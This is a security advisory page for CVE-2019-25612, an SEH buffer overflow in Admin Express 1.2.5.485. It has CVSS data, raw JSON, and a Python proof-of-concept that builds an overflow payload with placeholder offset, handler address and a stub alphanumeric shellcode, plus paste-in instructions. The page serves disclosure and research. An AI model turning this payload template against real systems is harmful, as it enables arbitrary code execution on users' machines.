Security Vulnerability Report
CVE-2019-25612 CVSS 7.8 HIGH

CVE-2019-25612

Published: 2026-03-22 14:16:30
Last Modified: 2026-04-16 16:19:51

Description

Admin Express 1.2.5.485 contains a local structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an alphanumeric encoded payload in the Folder Path field. Attackers can trigger the vulnerability through the System Compare feature by pasting a crafted buffer overflow payload into the left-hand side Folder Path field and clicking the scale icon to execute shellcode with application privileges.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Admin Express 1.2.5.485

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import struct

# Proof of Concept (PoC) for CVE-2019-25612
# This script generates a malicious payload to trigger the SEH buffer overflow.
# Note: Offsets and addresses need to be adjusted based on the specific environment and version.
# Example structure: [Junk] + [nSEH] + [SEH] + [Shellcode] + [Padding]

def generate_payload():
    # 1. Offset to overwrite SEH structure (This value is hypothetical and needs debugging)
    offset = 600

    # 2. nSEH: Next SEH record overwrite
    # \xeb\x06 is a short jump forward 6 bytes to skip the SE handler address
    # \x90\x90 are NOPs
    nseh = b"\xeb\x06\x90\x90"

    # 3. SEH: SE Handler overwrite
    # Address of 'pop pop ret' instruction from a non-ASLR module is required here.
    # This is a placeholder address (0x10020203)
    seh = struct.pack('<L', 0x10020203)

    # 4. Shellcode: Alphanumeric encoded payload
    # Example: MessageBoxA shellcode encoded for compatibility
    # Real attackers would use Meterpreter or a reverse shell here.
    shellcode = b"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"

    # 5. Padding to ensure we crash the process properly
    padding = b"C" * (1000 - offset - len(nseh) - len(seh) - len(shellcode))

    payload = b"A" * offset + nseh + seh + shellcode + padding
    return payload

if __name__ == "__main__":
    buf = generate_payload()
    print("[+] Payload generated successfully.")
    print(f"[+] Payload length: {len(buf)} bytes")
    print("[+] Instruction: Copy the output and paste it into the 'Folder Path' field in Admin Express 'System Compare' feature, then click the scale icon.")

    # Write to file for easy handling
    with open("cve_2019_25612_poc.txt", "wb") as f:
        f.write(buf)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25612", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:29.550", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admin Express 1.2.5.485 contains a local structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an alphanumeric encoded payload in the Folder Path field. Attackers can trigger the vulnerability through the System Compare feature by pasting a crafted buffer overflow payload into the left-hand side Folder Path field and clicking the scale icon to execute shellcode with application privileges."}, {"lang": "es", "value": "Admin Express 1.2.5.485 contiene una vulnerabilidad de desbordamiento de búfer de manejo de excepciones estructurado local que permite a atacantes locales ejecutar código arbitrario al proporcionar una carga útil codificada alfanuméricamente en el campo 'Folder Path'. 
Los atacantes pueden activar la vulnerabilidad a través de la función 'System Compare' pegando una carga útil de desbordamiento de búfer manipulada en el campo 'Folder Path' del lado izquierdo y haciendo clic en el icono de escala para ejecutar shellcode con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://admin-express.en.softonic.com/", "source": "[email protected]"}, {"url": "https://admin-express.en.softonic.com/download", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46805", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/admin-express-local-seh-buffer-overflow-via-folder-path", "source": "[email protected]"}]}}